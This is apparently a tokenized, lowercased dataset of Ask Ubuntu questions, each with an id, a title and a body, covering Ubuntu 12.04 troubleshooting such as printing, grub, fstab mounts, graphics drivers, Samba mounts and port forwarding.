140799	canon mx870 printer only shows `` processing '' on the status lcd	i had my canon mx870 installed perfectly fine in 11.10 , but since upgrading to 12.04 , it no longer works . the printer is recognized in print settings and when i attempt to print a test page , the printer lcd displays a `` processing '' message , but then it disappears and nothing happens . here are my logs ( note that printing did not succeed despite the access logs showing success ) : # /var/log/cups/access_log localhost - - [ 22/may/2012:12:29:35 -0400 ] `` post /printers/canon-mx870 http/1.1 '' 200 412 print-job successful-ok - # /var/log/cups/error_log w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-gray.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-rgb.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-canon-mx870 ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-gray.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-rgb.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-canon-mx870 ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-gray.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-rgb.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-canon-mx870 ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-gray.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createprofile : org.freedesktop.colormanager.alreadyexists : profile id 'canon-mx870-rgb.. ' already exists w [ 22/may/2012:12:25:51 -0400 ] failed to createdevice : org.freedesktop.colormanager.alreadyexists : device id 'cups-canon-mx870 ' already exists
140801	changes in grub.cfg are ignored	i 'm trying to change the default os in grub , but when i do sudo gedit /boot/grub/grub.cfg and change it to option 3 instead of 0 and run update-grub , nothing changes . the default selected os is still the first one and when i look in grub.cfg it 's back to 0 . what am i doing wrong ?
140803	steps for creating a slightly modified package and uploading it in a ppa ?	i just want to use an ubuntu package from the official ubuntu repos , modify its source just a tiny bit ( it will not affect dependencies or anything ) and then upload it into a launchpad ppa i made for it . i do n't want to become a professional ubuntu package maintainer , so reading all the docs about creating an ubuntu package from scratch is overkill for me . so , are there some simple steps to take for this task ? ps : i 'm doing this because of this bug in bpython and other things i may not like about ubuntu packages in the official ubuntu repos .
140807	problem mounting ntfs drive automatically	i have a few ntfs drives which i want ubuntu to auto-mount , as a sample i tried it for 1 drive i included this line in `` fstab '' /dev/sda2 /home/tejas/tejas ! ntfs users , defaults , umask=000 0 0 and it doesnt get automounted ... when i mount it manually i get the following message error mounting : mount exited with exit code 1 : helper failed with : unprivileged user can not mount ntfs block devices using the external fuse library . either mount the volume as root , or rebuild ntfs-3g with integrated fuse support and make it setuid root . please see more information at http : //tuxera.com/community/ntfs-3g-faq/ # unprivileged i am using ubuntu 12.04 in wubi can someone tell how i can mount it automatically .
140809	dell inspiron mini 10 boots into black screen , and only top half paints	i 'm a first time ubuntu user . just installed 12.04 . only the top half of the display paints , and when i reboot , the screen goes black . my only work around is closing the laptop until it hibernates , then opening lid . then i can log in , but only top half of display works . very frustrating . is this a known bug ? anyone else experiencing this ? thanks . jack
140810	difficulty in downloading software packages	i am not able to download software sometimes it shows available from the `` main source '' and sometimes it shows available from the `` universal source '' plz . help
140811	how can i use prior version recovery mode ?	i upgraded to ubuntu 12.04 ( from 11.10 ) this morning . after the installation succeeded , the computer restarted and since then i have not been able to use my keyboard or mouse ( once i get to the graphical ui login screen ) . is it possible to rollback the installation to its previous state ? i am hoping to avoid a fresh install as i have installed a bunch of dev tools and its quite painful to have to re-install everything [ edit ] : title changed . the previous title was `` how to rollback ubuntu installation to 64bit 11.10 '' as installing ubuntu 12.04 over 11.10 ended up making my computer unusable
140812	how to change touch screen functionality from a relative to an absolute pointing device ?	i 'm using a serial wacom tablet touch device on an hp elitebook 2740p . the capacitive finger touch device ( serial wacom tablet touch ) works , but is set to relative positioning instead of absolute . this means it works like a touchpad rather than a touch screen . system settings has options for the pen portion of the touch screen , but i ca n't find any settings for the touch part . is there anyway to configure the touch screen to work as an absolute pointing device ? thanks this is the output of xinput : : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech unifying device . wireless pid:1017 id=10 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 generic mouse id=12 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ serial wacom tablet stylus id=14 [ slave pointer ( 2 ) ] ⎜ ↳ serial wacom tablet eraser id=16 [ slave pointer ( 2 ) ] ⎜ ↳ serial wacom tablet touch id=17 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ hp webcam [ 2 mp macro ] id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys id=15 [ slave keyboard ( 3 ) ]
140817	upgraded hp pavilion g7 1317cl with bios vers f45 to 8gb only 3.3gb recognised in ubuntu 12.04 x64	bios and hardware probes indicate 8gb installed . swapped chip slots with no difference in behavior . dmesg e820 map as follows : bios-provided physical ram map : [ 0.000000 ] bios-e820 : 0000000000000000 - 000000000009f800 ( usable ) [ 0.000000 ] bios-e820 : 000000000009f800 - 00000000000a0000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000000e0000 - 0000000000100000 ( reserved ) [ 0.000000 ] bios-e820 : 0000000000100000 - 00000000bf9bf000 ( usable ) [ 0.000000 ] bios-e820 : 00000000bf9bf000 - 00000000bfabf000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000bfabf000 - 00000000bfbbf000 ( acpi nvs ) [ 0.000000 ] bios-e820 : 00000000bfbbf000 - 00000000bfbf5000 ( acpi data ) [ 0.000000 ] bios-e820 : 00000000bfbf5000 - 00000000bfc00000 ( usable ) [ 0.000000 ] bios-e820 : 00000000bfc00000 - 00000000e0000000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000f8000000 - 00000000fc000000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fec00000 - 00000000fec01000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fec10000 - 00000000fec11000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fed80000 - 00000000fed81000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000fee00000 - 00000000fee01000 ( reserved ) [ 0.000000 ] bios-e820 : 00000000ffe00000 - 0000000100000000 ( reserved ) [ 0.000000 ] bios-e820 : 0000000100000000 - 000000011f000000 ( usable ) [ 0.000000 ] nx ( execute disable ) protection : active [ 0.000000 ] dmi 2.7 present . [ 0.000000 ] dmi : hewlett-packard hp pavilion g7 notebook pc/3568 , bios f.45 01/17/2012 [ 0.000000 ] e820 update range : 0000000000000000 - 0000000000010000 ( usable ) == > ( reserved ) [ 0.000000 ] e820 remove range : 00000000000a0000 - 0000000000100000 ( usable )
140818	what is the best way to use the mysql charm in juju with dynamic database credientials ?	i am creating a juju charm to encompass many django development projects . i have the charm installing django , wsgi , and apache2 . django uses a separate database , user , and password for every project created . how do i provide these credentials to the charm when the mysql charm has only one set of database credentials ? i would like to parse the python paths for all installed django projects and have a mysql charm ready to use with them . as you can see below , the user will have to set these manually and change them when a new/different django project is deployed to the cloud . user=`relation-get user` password=`relation-get password` host=`relation-get host` database=`relation-get database` my question : do i need to create a bash script to auto-create mysql charms with a correlating name to the django project ?
140819	license concerns for ubuntu/linux and a prospective business	having a hard time finding specifics , could someone link me to some materials concerning licensing issues of ubuntu , and link 's at large ? i 'm considering starting a business installing custom/embedded computer systems , and the open source nature of various linux distros makes them the most attractive candidates for final installation . i just want to make sure it would be legal to do so . would i be able to charge for installation of the os ? if not , could i provide the customer the physical means for installation ( cd , usb ) ?
140820	nvidia gt630m with hdmi second monitor	i am unable to use double screen with hdmi ( works with vga however ) on my asus laptop with nvidia 630m i tried downloading the newest nvidia driver , however i can not make it work properly and my second screen remains unoticed and black . this is the message i get with nvidia x server settings : '' you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server. '' my two questions : 1/ how do i `` run '' nvidia-xconfig ( what is the command line ? ) as root ( is it `` sudo nvidia-xconfig '' ? 2/ shall this will make my hdmi port work ( it works under w7 ) or do i have to install something else in ubuntu to make hdmi work ? help much appreciated since i want to completely quit macos ( keeping w7 sadly due to gaming ) . i found many proposals on forum but only succeeded in 740x480 blocked res as others in this forum have reported . regards , yohan
140828	how can i paste text by pressing the left and right mouse buttons at the same time ?	i am coming from ubuntu 10 . i just recently upgraded to 12.04 lts . in 10 , i use to be able to cut and paste from terminal by selecting text , and just pressing my two mouse buttons . in 12.04 , i ca n't seem to do this . i have to highlight text , then right click to copy , then right click to paste . or , i can do ctrl-shift-c and ctrl-shift-v . both are okay methods , but not as fast as before . how do i configure ubuntu to preserve 'old-school ' cut and paste ?
140833	how to take a screenshot ?	i have tried using ksnapshot and the only thing that does is take a screenshot behind the terminal and i have tried using take vector screenshot . vector screenshot does nothing and i 'm lost . please someone help me .
140835	how to uninstall all packages installed by `` aptitude build-dep ''	is it possible to undo all changes made by `` aptitude build-dep xxxxxx '' i.e to un-install all dependencies installed by this command ?
140842	how can i install 12.04 lts on a non-pae machine ?	the other day i started trying out ubuntu on an ageing samsung q30 ( like a dell latitude x1 , apparently ) . i kept an existing windows xp installation and allocated 6gb to the ubuntu partition as i will only be using the ubuntu for browsing and playing sound files . here 's the order i tried things out and what happened . 12.04 lts -- wo n't boot/wo n't install because of non-pae . 10.04 lts -- had the ubuntu loading screen for a while with the dots moving and the cd drive whirring , then the screen went ( and remained ) completely black with no hard drive activity and the cd drive also stopped and went silent . 9.10 -- worked beautifully ! but lumbered with an ancient un-upgradable version of firefox and it was a battle and a half to get flash video and mp3 playback capability working given 9.10 's advanced years and dead download links . realising that 9.10 is not supported any longer . i decided to look up what the non-pae error was about , and i have learned that it would be possible to get 12.04 lts via an upgrade from 11.10 . `` but '' , i thought , `` 10.04 lts did n't work at all , and 12.04 does n't work , so shall i assume that 11.10 wo n't work ? '' computers being computers , though , i tried doing a boot from cd trial of 11.10 and it does work ! so i 'd like to go ahead with the following if anyone can advise or point to some online instructions for this situation . i would like to : keep the partitions as they are keep the windows xp installation as it is and still be able to boot to it when required completely remove 9.10 do a completely new install of 11.10 from the cd . i 've only had the ubuntu for a couple of days and i have no data or settings/personalisations that i need to keep . but i 'm really enjoying browsing with ubuntu ( even with an ancient version of firefox ) and find the text rendering for reading online articles much superior to even windows cleartype . again , many thanks in advance for advice and pointers ! p.s . the original title of this question was about how to completely remove 9.10 and replace it with 11.10 ( with a view to then being able to upgrade to 12.04 ) . over the course of the questions and answers , i suggested changing the title to the current one as it now better reflects the content . i hope this is acceptable and provides an explanation to the comment that this is a possible duplicate answer .
140853	problems after upgrading to 12.04 - black screen after log in !	i just upgraded my stationary dell to 12.04 but ran into problems . after restart i can log in but after that all i have is a black screen - nothing ! no terminal to type any commands in ... what shall i do ?
140855	ca n't install 12.04 server under intel pentium m	i recently decided to upgrade ubuntu 10.04 to 12.04 . my old mv mobeus was already dual-booting the desktop and server versions of ubuntu from the grub boot loader . i managed to upgrade the desktop version from 10.04 to 12.04 easily , and without any problems , but since i 'd already hashed up my server installation , i decided to reinstall the server . i was soon told by the installer that my processor did n't have 'pae ' ( physical address extension ) , but leaves me to question whether or not there are significant kernel differences between desktop and server . by the way , the processor is the intel pentium m 1.6ghz , with intel speedstep technology .
140857	emacs uninstallation and upgrade	currently i have the standard emacs installation , 2.3.1 , from ubuntu repo , but would like to get a newer version of emacs from gnu website , which is 2.3.4 . my question is that do i need to wipe out my current installation completely and build it from scratch or i can just run the build script from the 2.3.4 and overwrite those file if found identical ? also , a general question , if i install third party software other than those from ubuntu repo , most of them do n't have any uninstall scripts , how do i get rid of those cleanly ? thanks a ton
140858	installing lubuntu without changing partitions	i 've just downloaded and burned lubuntu to a disc , and want to install it . however during the installation it wants to split my hd up in 2 partitions . i really dont want this , as i 'm afraid my current win7 installation will get corrupt , and just want to keep 1 partition in general . can i somehow skip this step , if not why ?
140864	how can i programmaticatly check if a source is in sources.list ?	for both 10.04 lts and 12.04 lts , is there a way check to see if a source is in /etc/apt/sources.list from a bash script , other than using grep ?
140872	disable the message `` these files are on a digital audio player '' in na	when i mount my android phone with usb cable to ubuntu 12.04 i get `` these files are on a digital audio player '' and open with rhythmbox in nautilus.this means that i am not able to see any file within my android . is it possible to disable the recognition of digital audio player and just list all files as usual ? edit i found the issue . the issue was completely different than i thought . i actually have a samsung galaxy s2 . if you plug in the phone via usb you can see the device but you are not able to see any files . but if you follow this guide , you will be able to see all files ; http : //www.the-computer-geek.co.uk/ ? p=435 thanks everybody for your efforts .
140875	windows system reserved partition mounting in ubuntu 12.04	guys i 've installed windows 7 with ubuntu 12.04 lts and both are working good ... . the only issue i have is that whenever i boot into ubuntu ... at booting it says ... the disk drive for /windows is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery . after pressing s it boots n works great ... .but it shows the windows system reserved partition and if i click on it ... .it mounts ... what i want to do is get rid to that annoying message and hide my windows system reserved partition . i know it has to do something with fstab but i 'm new to ubuntu so do n't want to go messing about things.. thanks for your help in advance this is my fstab ... # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=8e5b0c69-2c42-4e11-9991-73da7a7aae3c / ext4 errors=remount-ro 0 1 # /home was on /dev/sda5 during installation uuid=f074d97f-2309-44e7-a397-25a5f7e98e3b /home ext4 defaults 0 2 # /windows was on /dev/sda6 during installation uuid=feca-7d83 /windows vfat utf8 , umask=007 , gid=46 0 1 # swap was on /dev/sda7 during installation uuid=0ad1446c-5d05-490a-9aea-e6dbf0ac2019 none swap sw 0 0
140879	no webcam device	deeva @ androliyah-a6200 : ~ $ sudo lshw -c video [ sudo ] password for deeva : *-display description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 02 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:43 memory : f0000000-f03fffff memory : e0000000-efffffff ioport : e080 ( size=8 ) deeva @ androliyah-a6200 : ~ $ how do i get my webcam to work ?
140881	problems with dual screen in awesome	i 'm running ubuntu 12.04 on an late 2010 macbook in order to use it lid-closed with a big screen and to use it with awesome . i activted both screens with the nvidia-settings tool . awesome starts two seperate instances of the window manager . we want the external monitor to be the main screen and i dont need another instance of awesome on my laptop monitor . it seems like the awesome instance on my external screen does not run all the commands as the instance on the laptop screen because the fonts in gtk-applications are really small . and the font monospace in the terminal looks completely different ( not that smooth ) on the external monitor . this is the output of xrandr -q on my laptop screen awesome instance xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 175 , current 1280 x 800 , maximum 1280 x 800 default connected 1280x800+0+0 0mm x 0mm 1280x800 50.0* 1024x768 51.0 52.0 ... and on my external screen awesome instace xrandr : failed to get size of gamma for output default screen 1 : minimum 320 x 175 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 0mm x 0mm 1920x1080 50.0* 51.0 1680x1050 52.0 53.0 ... how do i deactivte the laptop screen and make the external screen my one and only awesome instance which displays the fonts nicely ? is it even possible to this lid-closed ?
140883	wireless shows up and keeps asking for password	i installed ubuntu for the first time ( first time ever using linux ) i used my friends wireless card to update but when i got home and put in my wireless card it asks me for a password i put in my password , it tries to connect for 20-40 seconds and then it asks again for password.. and every other device i have has had no problem connecting with the same password and network ?
140886	rear/front mic not shown on sound manager	with ubuntu 11.10 , in the sound options , in the input tab were my 2 microphones , an usb one and the headset , connected to the rear/front microphone . now , 12.04 , it only shows the usb microphone . the headset microphone also works , but i have to configure it from pulse audio volume control . i need both , so i want to configure them easily from the sound options . why this mic is not shown ? i have seen i 'm not the only one with this problem , but i have n't found any solution . thanks for reading and your help
140891	mount.cifs stopped working after last kernel upgrade	yesterday ( 05/21 ) i upgraded my ubuntu 12.04 kernel : uname -a : linux vi 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux after the reboot all my mounts of external samba shares stopped working . when i execute : sudo mount -t cifs //192.168.101.168/video /mnt/video the result is : mount error : cifs filesystem not supported by the system mount error ( 19 ) : no such device refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) and dmesg shows : [ 2785.792456 ] cifs : unknown symbol locks_delete_block ( err 0 ) if i execute : sudo modprobe cifs the result is : fatal : error inserting cifs ( /lib/modules/3.2.0-24-generic/kernel/fs/cifs/cifs.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) and dmesg shows again : [ 5811.742563 ] cifs : unknown symbol locks_delete_block ( err 0 ) is there any known workaround for this ?
140895	nvidia card not detected -- clean install -- have tried many solutions	i have a dell l501x with a clean install ( now clean , anyway ) of 12.04 . my issue is that i do not have anything in the additional/restricted driver dialog . i have an optimus nvidia 425m i believe with the associated intel card . now , from a fresh install ( since i 've already failed at attempting to use xorg-edger ppa , using ironhide , bumblebee , etc ) how would i set up my nvidia card so that i can at the very least , have it show up as a named card and not as `` unknown '' . my eventual goal is to play minecraft with decent framerates . brian
140900	shell script that checks user activity and sends an email to the user in case of inactivity	i need to check user activity under linux ( ubuntu ) and after 10 minutes i need to alert the user over email . by inactivity , i 'm referring to cpu usage of the processes that user is running . i tried using `` ps -a '' to get the user proceses , but i do n't know how to check for specific cpu usage
140902	which version of java should i use for minecraft ?	what version of java do i need for minecraft and how would i install it i 've been to multiple forums but ca n't figure it out .
140910	unity greeter background not changing for users automatically after upgrade	i have recently upgraded from 11.10 to 12.04 . normal upgrade , no new installation . in 11.10 i was using simple lightdm manager tool to set a custom wallpaper on the login screen . this tool unfortunately does n't seem to do anything since i have upgraded . i have also heard that 12.04 is suppose to have this feature ( changing login wallpaper per different user ) by default . i have searched in settings but unfortunately in vain . so , to keep it short , could somebody direct me to the option ( s ) page where i can make the desired changes .
140911	boot-repair failing on 12.04 dual boot	after reinstalling 12.04 on my machine alongside windows 7 i got the grub rescue prompt . following from other posts on here i installed and ran boot repair . however it seems to be running into some problems , here is the paste output of the boot-repair : http : //paste.ubuntu.com/1001832/ any suggestions would be appreciated
140912	monitor shows only middle of screen , edges missing . after update 11.10 to 12.04	i have a hp pavillion , ( graphics geforce gt 220/pcie/sse2 ) and after the update this problem came . it looks like i zoomed in on the screen , but the edges are 'there ' when i click the mouse . i tried a couple of things , and the problem is under all users , and already there at the login screen . i looked at the nvidia settings , but i know not enough to see an error . it shows the correct monitor , 1680x1050 , and an overscan of 0 % . i saw my xorg.conf is rather long , after many updates . what can i do ? i would like to try to refresh the installation of my xserver , or desktop , ultimately i would do a clean install . but if someone knows a better way out i would be very gratefull ! mark
140921	how do i install atheros wireless drivers on a server ?	i am trying to set up a host with ubuntu server edition on it so that i can have a file server , etc , but due to physical contraints , i 'm limited to wireless only for the time being . ubuntu server edition does n't come with compatible drivers for my wireless card , but ubuntu desktop edition definitely does . is there a way i can get the desktop edition drivers into server edition ? the wireless card is a d-link airplus g dwl-g510 , which i 'm pretty sure uses the atheros chipset .
140930	hope-dt gtk+ theme displays white fonts after upgrade to 12.04	i have recently upgraded from 11.10 to 12.04 . on ocelot i was using the hope theme tip to install it : give-your-linux-desktop-new-hope-with-this-gtk3-theme i especially liked the fact that it turned the sidebar in nautilus black , which i found pretty cool . after the upgrade , all my system fonts are white when i set the gtk+ theme to hope or hope-dt . see pic : now , is there any way to force the fonts colour ? or , if nothing else works , could you guys suggest a way to turn the sidebar in nautilus to black ? any nice dark gtk+ theme suggestions are also welcome . cheers . edit : from the hope theme page i see that in the comments more people are complaining about this issue after upgrading . so , my question now is : any way to control the system font colours ? or please suggest a them which adds black sidebars in nautilus . edit 2 : i have installed the .deb file from launchpad : hope precise unfortunately it did not solve the problem , however , now my ambience theme is gone ... . i ca n't even find it in /usr/share/themes . and now my entire desktop looks a bit crap . menus do n't seem right . can i install the default ambience theme from somewhere ?
140934	rule out a url from my proxy configuration on unity	i installed ubuntu 12.04 and it is running just fine . i only have a problem , i connect to the internet through a proxy at my college , but there are some url 's that i do n't need the proxy for , so my question is : how can i exempt a url from my proxy configuration on ubuntu ?
140938	is there any need to install amd graphics drivers if i am running ubuntu server ?	i run ubuntu server ( 12.04 , 64-bit ) . is there any need to install amd drivers for my gpu ? i do not intend to use any graphical environment , but i am wondering about power consumption . ps : this question is similar to the nvidia question here : is there any need to install nvidia graphics drivers if i am running ubuntu server ?
140940	why do i receive the `` duplicate sources '' error message during an ubuntu 12.04 live cd session ?	when i boot the ubuntu 12.04 desktop live cd and run the command sudo apt-get update , the final messages are the warning messages below . reading package lists ... done w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20120425 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20120425 ) _dists_precise_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems however , there do not appear to be any duplicate sources in /etc/apt/sources.list # /etc/apt/sources.list deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/main/binary-i386/ deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / dists/precise/restricted/binary-i386/ deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted deb http : //archive.ubuntu.com/ubuntu/ precise main restricted deb http : //security.ubuntu.com/ubuntu/ precise-security main restricted deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted i also ran the command gksudo software-properties-gtk and noticed that there are two entries under the other software tab for cdrom with ubuntu 12.04 'precise pangolin' removing these two entries in other software also eliminates the duplicate sources.list entry warning messages from apt-get update ( as well as other apt-get functions ) . i do not understand why those two entries for cdrom with ubuntu are present in the other software tab . the cd is also already selected as a possible install source under the ubuntu software tab . that should be enough , should n't it ? is there an error in the ubuntu 12.04 live environment 's default configuration of software sounces ? or am i doing something ( else ) wrong ? is it ok to remove the cdrom entries under other software to eliminate the w : duplicate sources.list entry cdrom : message ? update : i forgot to look at /etc/apt/sources.list after removing the entries from the other software tab . after doing that its contents becomes : # /etc/apt/sources.list deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) ] / precise main restricted deb http : //archive.ubuntu.com/ubuntu/ precise main restricted deb http : //security.ubuntu.com/ubuntu/ precise-security main restricted deb http : //archive.ubuntu.com/ubuntu/ precise-updates main restricted i 'm still confused as to what is going on here . is dists/precise/main/binary-i386/ and dists/precise/restricted/binary-i386/ the same thing as precise main restricted ? ? i did n't think so when i first looked at it , but then again removing those entries eliminates the duplicate sources.list warning messages .
140941	ubuntu frozen post update on restart	i just did today 's software center updates for ubuntu . on a required re-start , my computer is hanging at the shutdown screen that has `` ubuntu '' and the 5 dots underneat that change from white to orange . i 've had this happen to me before in previous installations on older versions of ubuntu , and when it has , i 've been forced to do a hard shut down . this inevitably ends up corrupting some files and my os either wo n't boot up correctly or i have sever sofware problems . i have n't done the hard reset yet , and i am wondering if there 's anything i can do to avoid doing the hard reset , and potentially saving my system from damage ?
140942	take a screenshot of webpage at intervals ?	i need a way to refresh a certain webpage and have a screenshot taken approximately every 5 minutes . i 'm new with ubuntu , but willing to use terminal , etc . if steps are given , i 've used it before , i just do n't know how to go about writing my own scripts . ideally , i would have the webpage open , and the page would refresh and take a screenshot every 5 minutes . any help with this ?
140944	i can not right click on the desktop	it was activating a few options of compiz config , but when it activates the option `` wallpaper '' , to be able to have different images in every office . first i unite awhile the screen , which is normal , that in order that it works this option it is necessary to deactivate a thing in ubuntu tweak or in gnome tweak tool , after deactivating it works perfectly . but later i realized that when i right click on the desktop nothing happens . i found that for arregrarlo gconf-publisher had to open , go to apps > nautilus > preferences , and to activate show `` desktop '' , but me this option does not appear , only it goes out saying : desktop fond , navigation_window_saved_geometry , navigation_window_saved_maximized start_with_sidebar .
140949	boot warning/error message	i have an external 2tb western digital hdd ( besides my 2 internal hdds , so this makes hime /dev/sdc ) . after loading grub , i have seen a quick error message . after checking the log file : /var/log/boot.log i can see it more clearly : xxx @ xxx : ~ $ cat /var/log/boot.log fsck from util-linux 2.20.1 ata_id [ 698 ] : hdio_get_identity failed for '/dev/sdc ' : invalid argument any thoughts ? should i be worried ?
140950	my server can not be reached from the outside internet , but works fine from the internal lan	i retired my old 1998 series pentium ii computer running ubuntu 7 server and replaced it using virtual box on a much faster and newer pc . the only job of this server is to run an old school mud server . i ghosted the hard drive and recreated it on the virtual box . everything is running right , except , i can not access the mud server from the outside internet . if i connect using its internal ip in my lan 192.168.1.13 , it works , while if i use my external ip , it does not . the port forwards are set up correctly . netstat shows this kyle @ fyremud : /fyremud/current/log $ sudo netstat -antp active internet connections ( servers and established ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:993 0.0.0.0 : * listen 4126/dovecot tcp 0 0 0.0.0.0:995 0.0.0.0 : * listen 4126/dovecot tcp 0 0 0.0.0.0:6666 0.0.0.0 : * listen 4043/fyremud tcp 0 0 192.168.1.13:6666 192.168.1.201:4286 syn_recv - tcp 0 0 192.168.1.13:6666 192.168.1.201:4264 syn_recv - tcp 0 0 192.168.1.13:6666 192.168.1.201:4291 syn_recv - tcp 0 0 192.168.1.13:6666 192.168.1.201:4280 syn_recv - tcp 0 0 192.168.1.13:6666 192.168.1.201:4298 syn_recv - tcp 0 0 192.168.1.13:6666 192.168.1.201:4252 syn_recv - tcp 0 0 0.0.0.0:110 0.0.0.0 : * listen 4126/dovecot tcp 0 0 0.0.0.0:143 0.0.0.0 : * listen 4126/dovecot tcp 0 0 0.0.0.0:8080 0.0.0.0 : * listen 4043/fyremud tcp 0 0 0.0.0.0:21 0.0.0.0 : * listen 4145/proftpd : ( acce tcp 0 0 127.0.0.1:25 0.0.0.0 : * listen 4104/master tcp 0 0 0.0.0.0:7001 0.0.0.0 : * listen 4043/fyremud tcp6 0 0 : ::22 : : : * listen 4034/sshd tcp6 0 444 : :ffff:192.168.1.13:22 : :ffff:192.168.1.2:3610 established4201/sshd : kyle [ pr all of the ones marked syn_recv are the connections from my desktop to my server using the internet ip addy . if i connect through the lan , it 'll say established . i checked the logs of the mud server , it 's not reporting connection attempts . this is leading me to beleive i have a foobarred setting in linux , and not the router , the virtual box software , or mud server . the other thing to point out is that my ethernet card is listed as eth1 ... i 'm assuming from the ghosting that eth0 is still associated with the card in the old computer . could this be my issue , and what would be the fix ?
140954	how does using two operating systems on one computer work ?	i am currently running windows 7 on my system and want to try out linux , but i 'm afraid to download it and have something happen to my computer . can i somehow download ubuntu and when i start up my computer have an option on running either ubuntu or windows ?
140959	how do i navigate to sabnzbd.ini in debian ?	i need to locate this file , and apparently it 's in ~/.sabnzbd/ . total linux newcomer here , how do i access that file ?
140960	dell inspiron 8100 wo n't suspend or hibernate	have a dell inspiron 8100 running lubuntu 11.10 & doing it very well with one exception . will not enter suspend or hibernate . would really like it to suspend when the lid is closed . when i close the lid it will not suspend & upon open it has a blank screen & requires a force shutdown . first - i read the hardware most likely did not support suspend . then i found in the hardware compatibility section : i will you advise to change the driver in xorg.conf to the 3d acceleration driver from ati . there for change the driver under device to fglrx but first pleace install the ati-drivers from the restricted deb repository . really have no idea how to do this - thought i would give option 3 a try first . 3 ) found this thread : can not suspend dell inspiron which might indicate running the following from terminal : *gksudo gedit /etc/pm/config.d/unload_modules and then add suspend_modules= '' xhci-hcd '' save & reboot . * have tried various attempts with this command but the unload file is never there after , using the ls command . is there an add command i am supposed to be using ? what is meant by save ? ctl+o ? or should a i issue an actual save command ? when i attempted to use the save command it asked me to install it ( did that ) but afraid i really have no idea what i 'm doing . am armed with a whole dictionary of linux commands now but need some help getting started . perhaps if i could just get one thing to work it would be a jumping off point . e.g . would like to see the `` unload_modules '' file there after performing the steps above . thanks , daemoncycler
